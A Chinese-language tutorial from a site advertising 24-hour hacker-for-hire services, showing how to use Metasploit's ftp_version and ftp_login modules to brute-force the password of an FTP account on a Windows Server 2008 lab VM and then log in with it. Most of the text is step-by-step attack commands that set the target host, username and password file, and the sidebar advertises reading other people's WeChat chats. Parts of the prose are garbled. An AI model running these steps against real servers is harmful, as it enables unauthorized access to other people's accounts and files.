黑客破解平台如何使用黑客?Metasploit破解并远程登录FTP服务器(2)

一、背景介绍FTP用于在两台计算机之间传输文件Internet其中广泛的服务之一。它可以根据实际需要设置每个用户的使用权限,并具有跨平台的特点,即UNIX、Linux和Windows可以在操作系统中实现FTP客户端和服务器可以跨平台传输文件。FTP服务是网络中常用的资源共享方式之一。FTP协议有PORT和PASV主动模式和被动模式是两种工作模式。FTP(File Transfer Protocol...

鸿铭黑客-黑客24小时在线接单网站 2022-05-27 0阅读

文章最后更新时间:2022年05月27日

一、背景介绍

FTP用于在两台计算机之间传输文件Internet其中广泛的服务之一。它可以根据实际需要设置每个用户的使用权限,并具有跨平台的特点,即UNIX、Linux和Windows可以在操作系统中实现FTP客户端和服务器可以跨平台传输文件。FTP服务是网络中常用的资源共享方式之一。FTP协议有PORT和PASV主动模式和被动模式是两种工作模式。

FTP(File Transfer Protocol)即基于文件传输协议的文件传输协议TCP采用客户/服务器模式的协议。FTP用户可以在协议中FTP上传或下载服务器中的文件。虽然现在是通过HTTP协议下载的网站很多,但是因为FTP协议可以很好地控制用户数量和宽带分配,快速方便地上传和下载文件。FTP它已成为上传和下载网络中文件的首选服务器。同时,它也是一个应用程序,用户可以在世界各地运行他们的计算机FTP服务器连接协议,访问服务器上的大量程序和信息。FTP服务的功能是实现完整文件的异地传输。



二、资源设备

1.安装好Kali Linux的虚拟机一台;

2.受害者Win2008 server R一个虚拟机;

3.一个准备出发的小白。



三、渗透攻防

3.1 运行ftp_version 漏洞使用框架,如下图所示。

命令:run

获取到FTP Banner 如下图所示:Microsoft FTP Servicex0dx0a








3.2 返回 ftp_version上层漏洞框架,如下图所示。

命令:back








3.3 检索Metasploit(msf)框架对于ftp_login如下图所示。

命令:search ftp_login








3.4 利用见多见的ftp_login如下图所示,漏洞模块。

命令:use auxiliary/scanner/ftp/ftp_login








3.5 查看ftp_login漏洞利用模块的参数,如下图所示。

命令:show options

RHOSTS:受害者主机IP

THREADS:线程数

USERNAME:FTP用户名

PASS_FILE:密码文件








3.6 设置RHOSTS参数,如下图所示。

命令:set rhosts 192.168.78.165








3.7 设置USERNAME参数,如下图所示。

命令:set username test1








3.8 设置PASS_FILE参数,如下图所示。

命令:set pass_file /root/pass.txt








3.8 设置THREADS参数,如下图所示。

命令:set threads 5








3.9 查看参数配置结果(参数是否配置成功),如下图所示。

命令:show options








3.10 执行ftp_login如下图所示,漏洞使用模块。

命令:run

如下图所示,ftp成功破解服务暴力。








3.11 命令远程登录ftp服务,如下图所示。

命令:ftp IP(ftp 192.168.78.165)








3.12 浏览器URL栏登录FTP服务,如下图所示。

步骤:URl栏输入ftp://IP 用破解的账户信息登录弹出窗口。



3.13 浏览器登录FTP如下图所示,服务成功。






文章来源:http://www.schmyw.com/
声明:如果有侵权内容、不妥之处,请第一时间联系我们删除。敬请谅解!

相关阅读

2971 文章数
3674 评论数

项目介绍

最近发表

随便看看

热门文章

咋样能彻底删除微信聊天记录「如果发现老公天天跟女人聊天怎么办」
永久删除微信聊天记录「怎么查别人微信聊天记录」
微信聊天记录能查到吗「微信聊天记录有没有办法恢复」

热评文章

标签列表